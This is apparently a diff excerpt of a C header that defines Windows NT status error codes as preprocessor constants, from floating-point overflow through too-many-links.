+-#define NT_STATUS_FLOAT_OVERFLOW 0xC0000000 | 0x0091
+-#define NT_STATUS_FLOAT_STACK_CHECK 0xC0000000 | 0x0092
+-#define NT_STATUS_FLOAT_UNDERFLOW 0xC0000000 | 0x0093
+-#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO 0xC0000000 | 0x0094
+-#define NT_STATUS_INTEGER_OVERFLOW 0xC0000000 | 0x0095
+-#define NT_STATUS_PRIVILEGED_INSTRUCTION 0xC0000000 | 0x0096
+-#define NT_STATUS_TOO_MANY_PAGING_FILES 0xC0000000 | 0x0097
+-#define NT_STATUS_FILE_INVALID 0xC0000000 | 0x0098
+-#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED 0xC0000000 | 0x0099
+-#define NT_STATUS_INSUFFICIENT_RESOURCES 0xC0000000 | 0x009a
+-#define NT_STATUS_DFS_EXIT_PATH_FOUND 0xC0000000 | 0x009b
+-#define NT_STATUS_DEVICE_DATA_ERROR 0xC0000000 | 0x009c
+-#define NT_STATUS_DEVICE_NOT_CONNECTED 0xC0000000 | 0x009d
+-#define NT_STATUS_DEVICE_POWER_FAILURE 0xC0000000 | 0x009e
+-#define NT_STATUS_FREE_VM_NOT_AT_BASE 0xC0000000 | 0x009f
+-#define NT_STATUS_MEMORY_NOT_ALLOCATED 0xC0000000 | 0x00a0
+-#define NT_STATUS_WORKING_SET_QUOTA 0xC0000000 | 0x00a1
+-#define NT_STATUS_MEDIA_WRITE_PROTECTED 0xC0000000 | 0x00a2
+-#define NT_STATUS_DEVICE_NOT_READY 0xC0000000 | 0x00a3
+-#define NT_STATUS_INVALID_GROUP_ATTRIBUTES 0xC0000000 | 0x00a4
+-#define NT_STATUS_BAD_IMPERSONATION_LEVEL 0xC0000000 | 0x00a5
+-#define NT_STATUS_CANT_OPEN_ANONYMOUS 0xC0000000 | 0x00a6
+-#define NT_STATUS_BAD_VALIDATION_CLASS 0xC0000000 | 0x00a7
+-#define NT_STATUS_BAD_TOKEN_TYPE 0xC0000000 | 0x00a8
+-#define NT_STATUS_BAD_MASTER_BOOT_RECORD 0xC0000000 | 0x00a9
+-#define NT_STATUS_INSTRUCTION_MISALIGNMENT 0xC0000000 | 0x00aa
+-#define NT_STATUS_INSTANCE_NOT_AVAILABLE 0xC0000000 | 0x00ab
+-#define NT_STATUS_PIPE_NOT_AVAILABLE 0xC0000000 | 0x00ac
+-#define NT_STATUS_INVALID_PIPE_STATE 0xC0000000 | 0x00ad
+-#define NT_STATUS_PIPE_BUSY 0xC0000000 | 0x00ae
+-#define NT_STATUS_ILLEGAL_FUNCTION 0xC0000000 | 0x00af
+-#define NT_STATUS_PIPE_DISCONNECTED 0xC0000000 | 0x00b0
+-#define NT_STATUS_PIPE_CLOSING 0xC0000000 | 0x00b1
+-#define NT_STATUS_PIPE_CONNECTED 0xC0000000 | 0x00b2
+-#define NT_STATUS_PIPE_LISTENING 0xC0000000 | 0x00b3
+-#define NT_STATUS_INVALID_READ_MODE 0xC0000000 | 0x00b4
+-#define NT_STATUS_IO_TIMEOUT 0xC0000000 | 0x00b5
+-#define NT_STATUS_FILE_FORCED_CLOSED 0xC0000000 | 0x00b6
+-#define NT_STATUS_PROFILING_NOT_STARTED 0xC0000000 | 0x00b7
+-#define NT_STATUS_PROFILING_NOT_STOPPED 0xC0000000 | 0x00b8
+-#define NT_STATUS_COULD_NOT_INTERPRET 0xC0000000 | 0x00b9
+-#define NT_STATUS_FILE_IS_A_DIRECTORY 0xC0000000 | 0x00ba
+-#define NT_STATUS_NOT_SUPPORTED 0xC0000000 | 0x00bb
+-#define NT_STATUS_REMOTE_NOT_LISTENING 0xC0000000 | 0x00bc
+-#define NT_STATUS_DUPLICATE_NAME 0xC0000000 | 0x00bd
+-#define NT_STATUS_BAD_NETWORK_PATH 0xC0000000 | 0x00be
+-#define NT_STATUS_NETWORK_BUSY 0xC0000000 | 0x00bf
+-#define NT_STATUS_DEVICE_DOES_NOT_EXIST 0xC0000000 | 0x00c0
+-#define NT_STATUS_TOO_MANY_COMMANDS 0xC0000000 | 0x00c1
+-#define NT_STATUS_ADAPTER_HARDWARE_ERROR 0xC0000000 | 0x00c2
+-#define NT_STATUS_INVALID_NETWORK_RESPONSE 0xC0000000 | 0x00c3
+-#define NT_STATUS_UNEXPECTED_NETWORK_ERROR 0xC0000000 | 0x00c4
+-#define NT_STATUS_BAD_REMOTE_ADAPTER 0xC0000000 | 0x00c5
+-#define NT_STATUS_PRINT_QUEUE_FULL 0xC0000000 | 0x00c6
+-#define NT_STATUS_NO_SPOOL_SPACE 0xC0000000 | 0x00c7
+-#define NT_STATUS_PRINT_CANCELLED 0xC0000000 | 0x00c8
+-#define NT_STATUS_NETWORK_NAME_DELETED 0xC0000000 | 0x00c9
+-#define NT_STATUS_NETWORK_ACCESS_DENIED 0xC0000000 | 0x00ca
+-#define NT_STATUS_BAD_DEVICE_TYPE 0xC0000000 | 0x00cb
+-#define NT_STATUS_BAD_NETWORK_NAME 0xC0000000 | 0x00cc
+-#define NT_STATUS_TOO_MANY_NAMES 0xC0000000 | 0x00cd
+-#define NT_STATUS_TOO_MANY_SESSIONS 0xC0000000 | 0x00ce
+-#define NT_STATUS_SHARING_PAUSED 0xC0000000 | 0x00cf
+-#define NT_STATUS_REQUEST_NOT_ACCEPTED 0xC0000000 | 0x00d0
+-#define NT_STATUS_REDIRECTOR_PAUSED 0xC0000000 | 0x00d1
+-#define NT_STATUS_NET_WRITE_FAULT 0xC0000000 | 0x00d2
+-#define NT_STATUS_PROFILING_AT_LIMIT 0xC0000000 | 0x00d3
+-#define NT_STATUS_NOT_SAME_DEVICE 0xC0000000 | 0x00d4
+-#define NT_STATUS_FILE_RENAMED 0xC0000000 | 0x00d5
+-#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED 0xC0000000 | 0x00d6
+-#define NT_STATUS_NO_SECURITY_ON_OBJECT 0xC0000000 | 0x00d7
+-#define NT_STATUS_CANT_WAIT 0xC0000000 | 0x00d8
+-#define NT_STATUS_PIPE_EMPTY 0xC0000000 | 0x00d9
+-#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO 0xC0000000 | 0x00da
+-#define NT_STATUS_CANT_TERMINATE_SELF 0xC0000000 | 0x00db
+-#define NT_STATUS_INVALID_SERVER_STATE 0xC0000000 | 0x00dc
+-#define NT_STATUS_INVALID_DOMAIN_STATE 0xC0000000 | 0x00dd
+-#define NT_STATUS_INVALID_DOMAIN_ROLE 0xC0000000 | 0x00de
+-#define NT_STATUS_NO_SUCH_DOMAIN 0xC0000000 | 0x00df
+-#define NT_STATUS_DOMAIN_EXISTS 0xC0000000 | 0x00e0
+-#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED 0xC0000000 | 0x00e1
+-#define NT_STATUS_OPLOCK_NOT_GRANTED 0xC0000000 | 0x00e2
+-#define NT_STATUS_INVALID_OPLOCK_PROTOCOL 0xC0000000 | 0x00e3
+-#define NT_STATUS_INTERNAL_DB_CORRUPTION 0xC0000000 | 0x00e4
+-#define NT_STATUS_INTERNAL_ERROR 0xC0000000 | 0x00e5
+-#define NT_STATUS_GENERIC_NOT_MAPPED 0xC0000000 | 0x00e6
+-#define NT_STATUS_BAD_DESCRIPTOR_FORMAT 0xC0000000 | 0x00e7
+-#define NT_STATUS_INVALID_USER_BUFFER 0xC0000000 | 0x00e8
+-#define NT_STATUS_UNEXPECTED_IO_ERROR 0xC0000000 | 0x00e9
+-#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR 0xC0000000 | 0x00ea
+-#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR 0xC0000000 | 0x00eb
+-#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR 0xC0000000 | 0x00ec
+-#define NT_STATUS_NOT_LOGON_PROCESS 0xC0000000 | 0x00ed
+-#define NT_STATUS_LOGON_SESSION_EXISTS 0xC0000000 | 0x00ee
+-#define NT_STATUS_INVALID_PARAMETER_1 0xC0000000 | 0x00ef
+-#define NT_STATUS_INVALID_PARAMETER_2 0xC0000000 | 0x00f0
+-#define NT_STATUS_INVALID_PARAMETER_3 0xC0000000 | 0x00f1
+-#define NT_STATUS_INVALID_PARAMETER_4 0xC0000000 | 0x00f2
+-#define NT_STATUS_INVALID_PARAMETER_5 0xC0000000 | 0x00f3
+-#define NT_STATUS_INVALID_PARAMETER_6 0xC0000000 | 0x00f4
+-#define NT_STATUS_INVALID_PARAMETER_7 0xC0000000 | 0x00f5
+-#define NT_STATUS_INVALID_PARAMETER_8 0xC0000000 | 0x00f6
+-#define NT_STATUS_INVALID_PARAMETER_9 0xC0000000 | 0x00f7
+-#define NT_STATUS_INVALID_PARAMETER_10 0xC0000000 | 0x00f8
+-#define NT_STATUS_INVALID_PARAMETER_11 0xC0000000 | 0x00f9
+-#define NT_STATUS_INVALID_PARAMETER_12 0xC0000000 | 0x00fa
+-#define NT_STATUS_REDIRECTOR_NOT_STARTED 0xC0000000 | 0x00fb
+-#define NT_STATUS_REDIRECTOR_STARTED 0xC0000000 | 0x00fc
+-#define NT_STATUS_STACK_OVERFLOW 0xC0000000 | 0x00fd
+-#define NT_STATUS_NO_SUCH_PACKAGE 0xC0000000 | 0x00fe
+-#define NT_STATUS_BAD_FUNCTION_TABLE 0xC0000000 | 0x00ff
+-#define NT_STATUS_DIRECTORY_NOT_EMPTY 0xC0000000 | 0x0101
+-#define NT_STATUS_FILE_CORRUPT_ERROR 0xC0000000 | 0x0102
+-#define NT_STATUS_NOT_A_DIRECTORY 0xC0000000 | 0x0103
+-#define NT_STATUS_BAD_LOGON_SESSION_STATE 0xC0000000 | 0x0104
+-#define NT_STATUS_LOGON_SESSION_COLLISION 0xC0000000 | 0x0105
+-#define NT_STATUS_NAME_TOO_LONG 0xC0000000 | 0x0106
+-#define NT_STATUS_FILES_OPEN 0xC0000000 | 0x0107
+-#define NT_STATUS_CONNECTION_IN_USE 0xC0000000 | 0x0108
+-#define NT_STATUS_MESSAGE_NOT_FOUND 0xC0000000 | 0x0109
+-#define NT_STATUS_PROCESS_IS_TERMINATING 0xC0000000 | 0x010a
+-#define NT_STATUS_INVALID_LOGON_TYPE 0xC0000000 | 0x010b
+-#define NT_STATUS_NO_GUID_TRANSLATION 0xC0000000 | 0x010c
+-#define NT_STATUS_CANNOT_IMPERSONATE 0xC0000000 | 0x010d
+-#define NT_STATUS_IMAGE_ALREADY_LOADED 0xC0000000 | 0x010e
+-#define NT_STATUS_ABIOS_NOT_PRESENT 0xC0000000 | 0x010f
+-#define NT_STATUS_ABIOS_LID_NOT_EXIST 0xC0000000 | 0x0110
+-#define NT_STATUS_ABIOS_LID_ALREADY_OWNED 0xC0000000 | 0x0111
+-#define NT_STATUS_ABIOS_NOT_LID_OWNER 0xC0000000 | 0x0112
+-#define NT_STATUS_ABIOS_INVALID_COMMAND 0xC0000000 | 0x0113
+-#define NT_STATUS_ABIOS_INVALID_LID 0xC0000000 | 0x0114
+-#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE 0xC0000000 | 0x0115
+-#define NT_STATUS_ABIOS_INVALID_SELECTOR 0xC0000000 | 0x0116
+-#define NT_STATUS_NO_LDT 0xC0000000 | 0x0117
+-#define NT_STATUS_INVALID_LDT_SIZE 0xC0000000 | 0x0118
+-#define NT_STATUS_INVALID_LDT_OFFSET 0xC0000000 | 0x0119
+-#define NT_STATUS_INVALID_LDT_DESCRIPTOR 0xC0000000 | 0x011a
+-#define NT_STATUS_INVALID_IMAGE_NE_FORMAT 0xC0000000 | 0x011b
+-#define NT_STATUS_RXACT_INVALID_STATE 0xC0000000 | 0x011c
+-#define NT_STATUS_RXACT_COMMIT_FAILURE 0xC0000000 | 0x011d
+-#define NT_STATUS_MAPPED_FILE_SIZE_ZERO 0xC0000000 | 0x011e
+-#define NT_STATUS_TOO_MANY_OPENED_FILES 0xC0000000 | 0x011f
+-#define NT_STATUS_CANCELLED 0xC0000000 | 0x0120
+-#define NT_STATUS_CANNOT_DELETE 0xC0000000 | 0x0121
+-#define NT_STATUS_INVALID_COMPUTER_NAME 0xC0000000 | 0x0122
+-#define NT_STATUS_FILE_DELETED 0xC0000000 | 0x0123
+-#define NT_STATUS_SPECIAL_ACCOUNT 0xC0000000 | 0x0124
+-#define NT_STATUS_SPECIAL_GROUP 0xC0000000 | 0x0125
+-#define NT_STATUS_SPECIAL_USER 0xC0000000 | 0x0126
+-#define NT_STATUS_MEMBERS_PRIMARY_GROUP 0xC0000000 | 0x0127
+-#define NT_STATUS_FILE_CLOSED 0xC0000000 | 0x0128
+-#define NT_STATUS_TOO_MANY_THREADS 0xC0000000 | 0x0129
+-#define NT_STATUS_THREAD_NOT_IN_PROCESS 0xC0000000 | 0x012a
+-#define NT_STATUS_TOKEN_ALREADY_IN_USE 0xC0000000 | 0x012b
+-#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED 0xC0000000 | 0x012c
+-#define NT_STATUS_COMMITMENT_LIMIT 0xC0000000 | 0x012d
+-#define NT_STATUS_INVALID_IMAGE_LE_FORMAT 0xC0000000 | 0x012e
+-#define NT_STATUS_INVALID_IMAGE_NOT_MZ 0xC0000000 | 0x012f
+-#define NT_STATUS_INVALID_IMAGE_PROTECT 0xC0000000 | 0x0130
+-#define NT_STATUS_INVALID_IMAGE_WIN_16 0xC0000000 | 0x0131
+-#define NT_STATUS_LOGON_SERVER_CONFLICT 0xC0000000 | 0x0132
+-#define NT_STATUS_TIME_DIFFERENCE_AT_DC 0xC0000000 | 0x0133
+-#define NT_STATUS_SYNCHRONIZATION_REQUIRED 0xC0000000 | 0x0134
+-#define NT_STATUS_DLL_NOT_FOUND 0xC0000000 | 0x0135
+-#define NT_STATUS_OPEN_FAILED 0xC0000000 | 0x0136
+-#define NT_STATUS_IO_PRIVILEGE_FAILED 0xC0000000 | 0x0137
+-#define NT_STATUS_ORDINAL_NOT_FOUND 0xC0000000 | 0x0138
+-#define NT_STATUS_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0139
+-#define NT_STATUS_CONTROL_C_EXIT 0xC0000000 | 0x013a
+-#define NT_STATUS_LOCAL_DISCONNECT 0xC0000000 | 0x013b
+-#define NT_STATUS_REMOTE_DISCONNECT 0xC0000000 | 0x013c
+-#define NT_STATUS_REMOTE_RESOURCES 0xC0000000 | 0x013d
+-#define NT_STATUS_LINK_FAILED 0xC0000000 | 0x013e
+-#define NT_STATUS_LINK_TIMEOUT 0xC0000000 | 0x013f
+-#define NT_STATUS_INVALID_CONNECTION 0xC0000000 | 0x0140
+-#define NT_STATUS_INVALID_ADDRESS 0xC0000000 | 0x0141
+-#define NT_STATUS_DLL_INIT_FAILED 0xC0000000 | 0x0142
+-#define NT_STATUS_MISSING_SYSTEMFILE 0xC0000000 | 0x0143
+-#define NT_STATUS_UNHANDLED_EXCEPTION 0xC0000000 | 0x0144
+-#define NT_STATUS_APP_INIT_FAILURE 0xC0000000 | 0x0145
+-#define NT_STATUS_PAGEFILE_CREATE_FAILED 0xC0000000 | 0x0146
+-#define NT_STATUS_NO_PAGEFILE 0xC0000000 | 0x0147
+-#define NT_STATUS_INVALID_LEVEL 0xC0000000 | 0x0148
+-#define NT_STATUS_WRONG_PASSWORD_CORE 0xC0000000 | 0x0149
+-#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT 0xC0000000 | 0x014a
+-#define NT_STATUS_PIPE_BROKEN 0xC0000000 | 0x014b
+-#define NT_STATUS_REGISTRY_CORRUPT 0xC0000000 | 0x014c
+-#define NT_STATUS_REGISTRY_IO_FAILED 0xC0000000 | 0x014d
+-#define NT_STATUS_NO_EVENT_PAIR 0xC0000000 | 0x014e
+-#define NT_STATUS_UNRECOGNIZED_VOLUME 0xC0000000 | 0x014f
+-#define NT_STATUS_SERIAL_NO_DEVICE_INITED 0xC0000000 | 0x0150
+-#define NT_STATUS_NO_SUCH_ALIAS 0xC0000000 | 0x0151
+-#define NT_STATUS_MEMBER_NOT_IN_ALIAS 0xC0000000 | 0x0152
+-#define NT_STATUS_MEMBER_IN_ALIAS 0xC0000000 | 0x0153
+-#define NT_STATUS_ALIAS_EXISTS 0xC0000000 | 0x0154
+-#define NT_STATUS_LOGON_NOT_GRANTED 0xC0000000 | 0x0155
+-#define NT_STATUS_TOO_MANY_SECRETS 0xC0000000 | 0x0156
+-#define NT_STATUS_SECRET_TOO_LONG 0xC0000000 | 0x0157
+-#define NT_STATUS_INTERNAL_DB_ERROR 0xC0000000 | 0x0158
+-#define NT_STATUS_FULLSCREEN_MODE 0xC0000000 | 0x0159
+-#define NT_STATUS_TOO_MANY_CONTEXT_IDS 0xC0000000 | 0x015a
+-#define NT_STATUS_LOGON_TYPE_NOT_GRANTED 0xC0000000 | 0x015b
+-#define NT_STATUS_NOT_REGISTRY_FILE 0xC0000000 | 0x015c
+-#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x015d
+-#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR 0xC0000000 | 0x015e
+-#define NT_STATUS_FT_MISSING_MEMBER 0xC0000000 | 0x015f
+-#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY 0xC0000000 | 0x0160
+-#define NT_STATUS_ILLEGAL_CHARACTER 0xC0000000 | 0x0161
+-#define NT_STATUS_UNMAPPABLE_CHARACTER 0xC0000000 | 0x0162
+-#define NT_STATUS_UNDEFINED_CHARACTER 0xC0000000 | 0x0163
+-#define NT_STATUS_FLOPPY_VOLUME 0xC0000000 | 0x0164
+-#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND 0xC0000000 | 0x0165
+-#define NT_STATUS_FLOPPY_WRONG_CYLINDER 0xC0000000 | 0x0166
+-#define NT_STATUS_FLOPPY_UNKNOWN_ERROR 0xC0000000 | 0x0167
+-#define NT_STATUS_FLOPPY_BAD_REGISTERS 0xC0000000 | 0x0168
+-#define NT_STATUS_DISK_RECALIBRATE_FAILED 0xC0000000 | 0x0169
+-#define NT_STATUS_DISK_OPERATION_FAILED 0xC0000000 | 0x016a
+-#define NT_STATUS_DISK_RESET_FAILED 0xC0000000 | 0x016b
+-#define NT_STATUS_SHARED_IRQ_BUSY 0xC0000000 | 0x016c
+-#define NT_STATUS_FT_ORPHANING 0xC0000000 | 0x016d
+-#define NT_STATUS_PARTITION_FAILURE 0xC0000000 | 0x0172
+-#define NT_STATUS_INVALID_BLOCK_LENGTH 0xC0000000 | 0x0173
+-#define NT_STATUS_DEVICE_NOT_PARTITIONED 0xC0000000 | 0x0174
+-#define NT_STATUS_UNABLE_TO_LOCK_MEDIA 0xC0000000 | 0x0175
+-#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA 0xC0000000 | 0x0176
+-#define NT_STATUS_EOM_OVERFLOW 0xC0000000 | 0x0177
+-#define NT_STATUS_NO_MEDIA 0xC0000000 | 0x0178
+-#define NT_STATUS_NO_SUCH_MEMBER 0xC0000000 | 0x017a
+-#define NT_STATUS_INVALID_MEMBER 0xC0000000 | 0x017b
+-#define NT_STATUS_KEY_DELETED 0xC0000000 | 0x017c
+-#define NT_STATUS_NO_LOG_SPACE 0xC0000000 | 0x017d
+-#define NT_STATUS_TOO_MANY_SIDS 0xC0000000 | 0x017e
+-#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x017f
+-#define NT_STATUS_KEY_HAS_CHILDREN 0xC0000000 | 0x0180
+-#define NT_STATUS_CHILD_MUST_BE_VOLATILE 0xC0000000 | 0x0181
+-#define NT_STATUS_DEVICE_CONFIGURATION_ERROR 0xC0000000 | 0x0182
+-#define NT_STATUS_DRIVER_INTERNAL_ERROR 0xC0000000 | 0x0183
+-#define NT_STATUS_INVALID_DEVICE_STATE 0xC0000000 | 0x0184
+-#define NT_STATUS_IO_DEVICE_ERROR 0xC0000000 | 0x0185
+-#define NT_STATUS_DEVICE_PROTOCOL_ERROR 0xC0000000 | 0x0186
+-#define NT_STATUS_BACKUP_CONTROLLER 0xC0000000 | 0x0187
+-#define NT_STATUS_LOG_FILE_FULL 0xC0000000 | 0x0188
+-#define NT_STATUS_TOO_LATE 0xC0000000 | 0x0189
+-#define NT_STATUS_NO_TRUST_LSA_SECRET 0xC0000000 | 0x018a
+-#define NT_STATUS_NO_TRUST_SAM_ACCOUNT 0xC0000000 | 0x018b
+-#define NT_STATUS_TRUSTED_DOMAIN_FAILURE 0xC0000000 | 0x018c
+-#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE 0xC0000000 | 0x018d
+-#define NT_STATUS_EVENTLOG_FILE_CORRUPT 0xC0000000 | 0x018e
+-#define NT_STATUS_EVENTLOG_CANT_START 0xC0000000 | 0x018f
+-#define NT_STATUS_TRUST_FAILURE 0xC0000000 | 0x0190
+-#define NT_STATUS_MUTANT_LIMIT_EXCEEDED 0xC0000000 | 0x0191
+-#define NT_STATUS_NETLOGON_NOT_STARTED 0xC0000000 | 0x0192
+-#define NT_STATUS_ACCOUNT_EXPIRED 0xC0000000 | 0x0193
+-#define NT_STATUS_POSSIBLE_DEADLOCK 0xC0000000 | 0x0194
+-#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT 0xC0000000 | 0x0195
+-#define NT_STATUS_REMOTE_SESSION_LIMIT 0xC0000000 | 0x0196
+-#define NT_STATUS_EVENTLOG_FILE_CHANGED 0xC0000000 | 0x0197
+-#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT 0xC0000000 | 0x0198
+-#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 0xC0000000 | 0x0199
+-#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT 0xC0000000 | 0x019a
+-#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT 0xC0000000 | 0x019b
+-#define NT_STATUS_FS_DRIVER_REQUIRED 0xC0000000 | 0x019c
+-#define NT_STATUS_NO_USER_SESSION_KEY 0xC0000000 | 0x0202
+-#define NT_STATUS_USER_SESSION_DELETED 0xC0000000 | 0x0203
+-#define NT_STATUS_RESOURCE_LANG_NOT_FOUND 0xC0000000 | 0x0204
+-#define NT_STATUS_INSUFF_SERVER_RESOURCES 0xC0000000 | 0x0205
+-#define NT_STATUS_INVALID_BUFFER_SIZE 0xC0000000 | 0x0206
+-#define NT_STATUS_INVALID_ADDRESS_COMPONENT 0xC0000000 | 0x0207
+-#define NT_STATUS_INVALID_ADDRESS_WILDCARD 0xC0000000 | 0x0208
+-#define NT_STATUS_TOO_MANY_ADDRESSES 0xC0000000 | 0x0209
+-#define NT_STATUS_ADDRESS_ALREADY_EXISTS 0xC0000000 | 0x020a
+-#define NT_STATUS_ADDRESS_CLOSED 0xC0000000 | 0x020b
+-#define NT_STATUS_CONNECTION_DISCONNECTED 0xC0000000 | 0x020c
+-#define NT_STATUS_CONNECTION_RESET 0xC0000000 | 0x020d
+-#define NT_STATUS_TOO_MANY_NODES 0xC0000000 | 0x020e
+-#define NT_STATUS_TRANSACTION_ABORTED 0xC0000000 | 0x020f
+-#define NT_STATUS_TRANSACTION_TIMED_OUT 0xC0000000 | 0x0210
+-#define NT_STATUS_TRANSACTION_NO_RELEASE 0xC0000000 | 0x0211
+-#define NT_STATUS_TRANSACTION_NO_MATCH 0xC0000000 | 0x0212
+-#define NT_STATUS_TRANSACTION_RESPONDED 0xC0000000 | 0x0213
+-#define NT_STATUS_TRANSACTION_INVALID_ID 0xC0000000 | 0x0214
+-#define NT_STATUS_TRANSACTION_INVALID_TYPE 0xC0000000 | 0x0215
+-#define NT_STATUS_NOT_SERVER_SESSION 0xC0000000 | 0x0216
+-#define NT_STATUS_NOT_CLIENT_SESSION 0xC0000000 | 0x0217
+-#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE 0xC0000000 | 0x0218
+-#define NT_STATUS_DEBUG_ATTACH_FAILED 0xC0000000 | 0x0219
+-#define NT_STATUS_SYSTEM_PROCESS_TERMINATED 0xC0000000 | 0x021a
+-#define NT_STATUS_DATA_NOT_ACCEPTED 0xC0000000 | 0x021b
+-#define NT_STATUS_NO_BROWSER_SERVERS_FOUND 0xC0000000 | 0x021c
+-#define NT_STATUS_VDM_HARD_ERROR 0xC0000000 | 0x021d
+-#define NT_STATUS_DRIVER_CANCEL_TIMEOUT 0xC0000000 | 0x021e
+-#define NT_STATUS_REPLY_MESSAGE_MISMATCH 0xC0000000 | 0x021f
+-#define NT_STATUS_MAPPED_ALIGNMENT 0xC0000000 | 0x0220
+-#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH 0xC0000000 | 0x0221
+-#define NT_STATUS_LOST_WRITEBEHIND_DATA 0xC0000000 | 0x0222
+-#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID 0xC0000000 | 0x0223
+-#define NT_STATUS_PASSWORD_MUST_CHANGE 0xC0000000 | 0x0224
+-#define NT_STATUS_NOT_FOUND 0xC0000000 | 0x0225
+-#define NT_STATUS_NOT_TINY_STREAM 0xC0000000 | 0x0226
+-#define NT_STATUS_RECOVERY_FAILURE 0xC0000000 | 0x0227
+-#define NT_STATUS_STACK_OVERFLOW_READ 0xC0000000 | 0x0228
+-#define NT_STATUS_FAIL_CHECK 0xC0000000 | 0x0229
+-#define NT_STATUS_DUPLICATE_OBJECTID 0xC0000000 | 0x022a
+-#define NT_STATUS_OBJECTID_EXISTS 0xC0000000 | 0x022b
+-#define NT_STATUS_CONVERT_TO_LARGE 0xC0000000 | 0x022c
+-#define NT_STATUS_RETRY 0xC0000000 | 0x022d
+-#define NT_STATUS_FOUND_OUT_OF_SCOPE 0xC0000000 | 0x022e
+-#define NT_STATUS_ALLOCATE_BUCKET 0xC0000000 | 0x022f
+-#define NT_STATUS_PROPSET_NOT_FOUND 0xC0000000 | 0x0230
+-#define NT_STATUS_MARSHALL_OVERFLOW 0xC0000000 | 0x0231
+-#define NT_STATUS_INVALID_VARIANT 0xC0000000 | 0x0232
+-#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND 0xC0000000 | 0x0233
+-#define NT_STATUS_ACCOUNT_LOCKED_OUT 0xC0000000 | 0x0234
+-#define NT_STATUS_HANDLE_NOT_CLOSABLE 0xC0000000 | 0x0235
+-#define NT_STATUS_CONNECTION_REFUSED 0xC0000000 | 0x0236
+-#define NT_STATUS_GRACEFUL_DISCONNECT 0xC0000000 | 0x0237
+-#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED 0xC0000000 | 0x0238
+-#define NT_STATUS_ADDRESS_NOT_ASSOCIATED 0xC0000000 | 0x0239
+-#define NT_STATUS_CONNECTION_INVALID 0xC0000000 | 0x023a
+-#define NT_STATUS_CONNECTION_ACTIVE 0xC0000000 | 0x023b
+-#define NT_STATUS_NETWORK_UNREACHABLE 0xC0000000 | 0x023c
+-#define NT_STATUS_HOST_UNREACHABLE 0xC0000000 | 0x023d
+-#define NT_STATUS_PROTOCOL_UNREACHABLE 0xC0000000 | 0x023e
+-#define NT_STATUS_PORT_UNREACHABLE 0xC0000000 | 0x023f
+-#define NT_STATUS_REQUEST_ABORTED 0xC0000000 | 0x0240
+-#define NT_STATUS_CONNECTION_ABORTED 0xC0000000 | 0x0241
+-#define NT_STATUS_BAD_COMPRESSION_BUFFER 0xC0000000 | 0x0242
+-#define NT_STATUS_USER_MAPPED_FILE 0xC0000000 | 0x0243
+-#define NT_STATUS_AUDIT_FAILED 0xC0000000 | 0x0244
+-#define NT_STATUS_TIMER_RESOLUTION_NOT_SET 0xC0000000 | 0x0245
+-#define NT_STATUS_CONNECTION_COUNT_LIMIT 0xC0000000 | 0x0246
+-#define NT_STATUS_LOGIN_TIME_RESTRICTION 0xC0000000 | 0x0247
+-#define NT_STATUS_LOGIN_WKSTA_RESTRICTION 0xC0000000 | 0x0248
+-#define NT_STATUS_IMAGE_MP_UP_MISMATCH 0xC0000000 | 0x0249
+-#define NT_STATUS_INSUFFICIENT_LOGON_INFO 0xC0000000 | 0x0250
+-#define NT_STATUS_BAD_DLL_ENTRYPOINT 0xC0000000 | 0x0251
+-#define NT_STATUS_BAD_SERVICE_ENTRYPOINT 0xC0000000 | 0x0252
+-#define NT_STATUS_LPC_REPLY_LOST 0xC0000000 | 0x0253
+-#define NT_STATUS_IP_ADDRESS_CONFLICT1 0xC0000000 | 0x0254
+-#define NT_STATUS_IP_ADDRESS_CONFLICT2 0xC0000000 | 0x0255
+-#define NT_STATUS_REGISTRY_QUOTA_LIMIT 0xC0000000 | 0x0256
+-#define NT_STATUS_PATH_NOT_COVERED 0xC0000000 | 0x0257
+-#define NT_STATUS_NO_CALLBACK_ACTIVE 0xC0000000 | 0x0258
+-#define NT_STATUS_LICENSE_QUOTA_EXCEEDED 0xC0000000 | 0x0259
+-#define NT_STATUS_PWD_TOO_SHORT 0xC0000000 | 0x025a
+-#define NT_STATUS_PWD_TOO_RECENT 0xC0000000 | 0x025b
+-#define NT_STATUS_PWD_HISTORY_CONFLICT 0xC0000000 | 0x025c
+-#define NT_STATUS_PLUGPLAY_NO_DEVICE 0xC0000000 | 0x025e
+-#define NT_STATUS_UNSUPPORTED_COMPRESSION 0xC0000000 | 0x025f
+-#define NT_STATUS_INVALID_HW_PROFILE 0xC0000000 | 0x0260
+-#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH 0xC0000000 | 0x0261
+-#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND 0xC0000000 | 0x0262
+-#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0263
+-#define NT_STATUS_RESOURCE_NOT_OWNED 0xC0000000 | 0x0264
+-#define NT_STATUS_TOO_MANY_LINKS 0xC0000000 | 0x0265
